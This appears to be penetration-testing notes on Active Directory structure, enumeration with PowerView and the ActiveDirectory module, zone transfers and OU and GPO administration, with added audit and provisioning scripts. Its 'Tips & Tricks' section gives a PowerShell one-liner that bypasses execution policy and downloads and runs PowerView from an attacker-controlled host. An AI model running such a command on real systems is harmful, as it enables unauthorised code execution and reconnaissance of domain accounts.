killchain-compendium/Miscellaneous/Active Directory/active_directory.md


Active Directory Enumeration

  • Offers centralized identity and access management (IAM), a.k.a. SSO, with authentication governed by policy management

  • In general, user accounts act on machine accounts (services)

  • Consists of

    • Domain Controller
    • Organizational Units, containing security principals, i.e. regular user or machine accounts
      • Users
      • Groups
    • Trusts
    • AD Domains
    • AD Forest
    • Policies
  • Administrative accounts are

    • Domain Admin
    • Enterprise Admin
    • Schema Admin
    • Server Operator
    • Account Operator

Domain Controller

  • AD Domain Services (AD DS) data store stores all objects on the network
  • Authentication and authorization
  • Update replication / sync with other domain controllers in the forest
  • Administration of domain resources

AD DS Store

  • Database of directory info such as users, groups and services
    • ntds.dit contains the information, including password hashes
    • Located under %SystemRoot%\NTDS

Forest

Consists of the following objects

  • Trees, hierarchies of domains in AD Domain Services
  • Domains, groups of objects
  • Organizational Units (OU), containers of objects such as groups, users, printers and other resources
  • Trusts, allows users to access resources in a different domain
  • Objects, e.g. users, groups, printers, computers or shares
  • Domain Services, DNS, LLMNR, SMB
  • Domain Schema, Rules for object creation

Users

  • Domain Admin, DC access

  • Server Accounts, service maintenance, may have admin permissions

  • Local Admin, administrative permission on an object but not on the DC

  • Domain Users, the average user account, which may have admin permissions on a local machine

  • Machine users

    • Machine accounts have local administrative permissions
    • Can be recognized by a $ at the end of the ID
    • Their passwords are rotated on a schedule
    • Passwords are 120 characters long per default

Security Groups

Important groups are the following

  • Domain Controllers, every DC in the domain

  • Domain Admins, DC access

  • Server Operators, administration of domain controllers but not groups

  • Backup Operators, full read access to any file

  • Account Operators, able to provision accounts

  • Domain Users, every user account in the domain

  • Domain Computers, every machine account in the domain

  • See the Microsoft documentation on Active Directory security groups for the full list

Policies

  • Rule sets
  • Apply to a domain
  • Enable or disable services domain-wide, e.g. antivirus and malware scanning
    • Disable Windows Defender
    • Communication signing, e.g. SMB

Domain Services

  • LDAP
  • Certificates handling for services, CRL
  • DNS, LLMNR, NBT-NS

Authentication

  • Kerberos, ticket-based (ticket granting service)
  • NTLM, challenge/response via hashes

Enumeration

  • Cmdlets on the Domain Controller

  • Get some help: Get-Help Get-Command -Examples, Get-Command Get-*

  • From the ActiveDirectory module

Import-Module ActiveDirectory
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
Get-ADForest | Select-Object Domains
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
  • systeminfo | findstr Domain
  • Get-ADUser -Filter *
  • Use the found CN and DC components to narrow the search
  • Get-ADUser -Filter * -SearchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"

Powerview Module

Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetDomainController
Get-NetForest
Get-NetDomainTrust
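The two cmdlet lists above only read the domain. The following audit script is an added example, not part of the compendium: it ties the ActiveDirectory cmdlets to the administrative groups listed at the top of these notes (plus Backup Operators), expands nested membership, flags weak account settings, and checks that machine accounts (the ones ending in $) are actually rotating their passwords. It assumes a domain-joined host with the RSAT ActiveDirectory module; the 30-day rotation default and the 90-day/365-day thresholds are the author's choices.

```powershell
# Added example (not from the compendium): audit privileged group membership and
# machine-account password rotation with the RSAT ActiveDirectory module.
# Assumes a domain-joined host; reading group membership needs no special rights.
Import-Module ActiveDirectory

$domain = Get-ADDomain
Write-Host "Domain $($domain.DNSRoot) (NetBIOS $($domain.NetBIOSName))"

# The administrative groups listed at the top of these notes, plus Backup Operators.
$privilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Schema Admins',
                      'Server Operators', 'Account Operators', 'Backup Operators')

foreach ($name in $privilegedGroups) {
    # Enterprise Admins and Schema Admins exist only in the forest root domain.
    $group = Get-ADGroup -Filter "Name -eq '$name'" -ErrorAction SilentlyContinue
    if (-not $group) { Write-Host "[-] $name not present in this domain"; continue }

    # -Recursive expands nested groups, so indirect members are included.
    $members = @(Get-ADGroupMember -Identity $group -Recursive)
    Write-Host "[+] $name : $($members.Count) effective member(s)"

    foreach ($m in $members) {
        if ($m.objectClass -ne 'user') {
            # Computers or managed service accounts in an admin group deserve a look.
            Write-Host "    $($m.SamAccountName) ($($m.objectClass))"
            continue
        }
        $u = Get-ADUser -Identity $m.DistinguishedName -Properties PasswordLastSet, PasswordNeverExpires, Enabled
        $flags = @()
        if (-not $u.Enabled)         { $flags += 'disabled' }
        if ($u.PasswordNeverExpires) { $flags += 'password never expires' }
        if ($u.PasswordLastSet -lt (Get-Date).AddDays(-365)) { $flags += 'password older than 1 year' }
        $note = if ($flags) { ' <- ' + ($flags -join ', ') } else { '' }
        Write-Host "    $($u.SamAccountName)$note"
    }
}

# Machine accounts end in '$' and rotate their password on a 30-day schedule by default.
# A stale PasswordLastSet usually means a decommissioned or orphaned computer object,
# which is exactly the kind of account that never gets patched or monitored.
$stale = @(Get-ADComputer -Filter * -Properties PasswordLastSet |
    Where-Object { $_.PasswordLastSet -lt (Get-Date).AddDays(-90) })
Write-Host "[+] $($stale.Count) machine account(s) with a password older than 90 days"
$stale | ForEach-Object { Write-Host "    $($_.SamAccountName)  last set $($_.PasswordLastSet)" }
```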

DNS

  • Check the local IP via ipconfig
  • Run nslookup, then server <LocalIP>, and attempt a zone transfer via
ls -d <Domain>

Tips & Tricks

  • Download and execute in one line
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerView.ps1'); Get-NetUser | select samaccountname, description"

Configuration

Configure Users and Groups

  • Use Start -> "Active Directory Users and Computers" to provision AD objects via organizational units (OU)

  • A set of users grouped together under a set of policies is defined as an organizational unit (OU)

  • A user is unique to a single OU

  • Default OUs are the following

    • Builtin
    • Users, user accounts
    • Computers, machine accounts
    • Domain Controllers, contains DC in the domain
    • Managed Service Accounts, service accounts in the domain
  • To delete an OU, use View -> Advanced Features. The Properties menu of the OU (right click) shows the checkbox Protect object from accidental deletion under the Object tab -> uncheck it and delete the OU afterwards

  • To delegate, open the properties with a right click -> Next -> Delegate Control -> Add -> choose a user and OK -> Next -> choose the tasks to delegate -> Next -> Finish

  • To change a user password via PowerShell

Set-ADAccountPassword <user> -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
  • To force the user to change the password at the next logon
Set-ADUser -ChangePasswordAtLogon $true -Identity <username> -Verbose
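The same provisioning flow as the GUI steps above, scripted with the ActiveDirectory module. This is an added example, not from the compendium; the OU name, display name and account name are placeholders, and it assumes the account running it may create objects under the domain root.

```powershell
# Added example (not from the compendium): create a protected OU and a user inside it,
# then hand out a one-time password that must be changed at first logon.
# Placeholders: the OU name and the user details. Requires rights to create objects.
Import-Module ActiveDirectory

$domain   = Get-ADDomain
$domainDn = $domain.DistinguishedName          # e.g. DC=example,DC=local (placeholder)
$ouName   = 'Helpdesk'                         # placeholder OU name
$ouDn     = "OU=$ouName,$domainDn"

# New OUs get 'Protect object from accidental deletion' (the checkbox named in the notes)
# enabled; keep it on so a stray delete in the GUI fails instead of removing every member.
$existing = Get-ADOrganizationalUnit -Filter "Name -eq '$ouName'" -SearchBase $domainDn -SearchScope OneLevel
if (-not $existing) {
    New-ADOrganizationalUnit -Name $ouName -Path $domainDn -ProtectedFromAccidentalDeletion $true
}

# Create the user directly in that OU. A user object lives in exactly one OU,
# which is visible in its distinguished name.
$sam     = 'j.doe'                             # placeholder account name
$initial = Read-Host -AsSecureString -Prompt "Initial password for $sam"
New-ADUser -Name 'Jane Doe' -SamAccountName $sam `
           -UserPrincipalName "$sam@$($domain.DNSRoot)" `
           -Path $ouDn -AccountPassword $initial `
           -Enabled $true -ChangePasswordAtLogon $true

# Verify the placement and that the one-time password is flagged for change (pwdLastSet = 0).
Get-ADUser -Identity $sam -Properties pwdLastSet |
    Select-Object SamAccountName, DistinguishedName, Enabled, pwdLastSet

# Tearing the OU down again requires the same two steps the GUI demands:
# clear the protection flag first, then delete recursively.
# Set-ADOrganizationalUnit -Identity $ouDn -ProtectedFromAccidentalDeletion $false
# Remove-ADOrganizationalUnit -Identity $ouDn -Recursive -Confirm:$false
```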

Managing Machine Users

  • The Computers OU should be split into at least Workstations and Servers

Group Policies

  • Group Policy Objects are applied to OUs

  • Use the application Group Policy Management to apply policies to OUs

  • GPOs under Group Policy Objects for the specific domain can be modified. They are inherited by all linked OUs. You can see the links to the OUs on the right-hand side when you click the GPO on the left

  • Child OUs inherit the policies of parent OUs

  • Security Filters can be set here as well

  • The Settings tab of a policy shows its actual content

  • Right click on a policy -> Edit to change its content. There are templates for many common policies

  • SYSVOL, an SMB share, is used to distribute the GPOs in the domain; it maps to C:\Windows\SYSVOL\sysvol\ on the domain controller

  • To force an update of changed policies across the domain, run

gpupdate /force
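To see the same linkage, inheritance and security filtering the Group Policy Management console shows, but from the command line, here is an added example (not from the compendium) using the RSAT GroupPolicy module. It assumes an OU named Workstations under the domain root (the split suggested under Managing Machine Users) and a host that can read the SYSVOL share; the OU name is a placeholder.

```powershell
# Added example (not from the compendium): list the GPOs that apply to an OU, their
# enforcement/inheritance state, who they are security-filtered to, and whether their
# SYSVOL folder is reachable. Requires the RSAT GroupPolicy and ActiveDirectory modules.
Import-Module GroupPolicy
Import-Module ActiveDirectory

$domain = Get-ADDomain
$ouDn   = "OU=Workstations,$($domain.DistinguishedName)"   # placeholder OU name

# Get-GPInheritance returns the GPOs linked on the OU itself (GpoLinks) and the full
# effective chain including parent OUs and the domain (InheritedGpoLinks).
$inh = Get-GPInheritance -Target $ouDn
Write-Host "Target: $ouDn"
Write-Host "Inheritance blocked: $($inh.GpoInheritanceBlocked)"

foreach ($link in $inh.InheritedGpoLinks) {
    # Security filtering: only trustees holding 'Apply Group Policy' receive the GPO.
    $applyTo = Get-GPPermission -Guid $link.GpoId -All |
        Where-Object { $_.Permission -eq 'GpoApply' } |
        ForEach-Object { $_.Trustee.Name }
    Write-Host ("[{0}] {1}  enforced={2} enabled={3}  applies to: {4}" -f
        $link.Order, $link.DisplayName, $link.Enforced, $link.Enabled, ($applyTo -join ', '))
}

# Clients read each GPO's content from SYSVOL under the GPO's GUID. Confirm the folder is
# there; a link whose folder is missing or unreadable silently fails to apply.
$policies = "\\$($domain.DNSRoot)\SYSVOL\$($domain.DNSRoot)\Policies"
foreach ($link in $inh.InheritedGpoLinks) {
    $path = Join-Path $policies "{$($link.GpoId)}"
    Write-Host ("{0,-40} sysvol folder present: {1}" -f $link.DisplayName, (Test-Path $path))
}
```

Get-GPOReport -Guid <id> -ReportType Html dumps the same content the Settings tab shows, which is handy for diffing a policy before and after an edit.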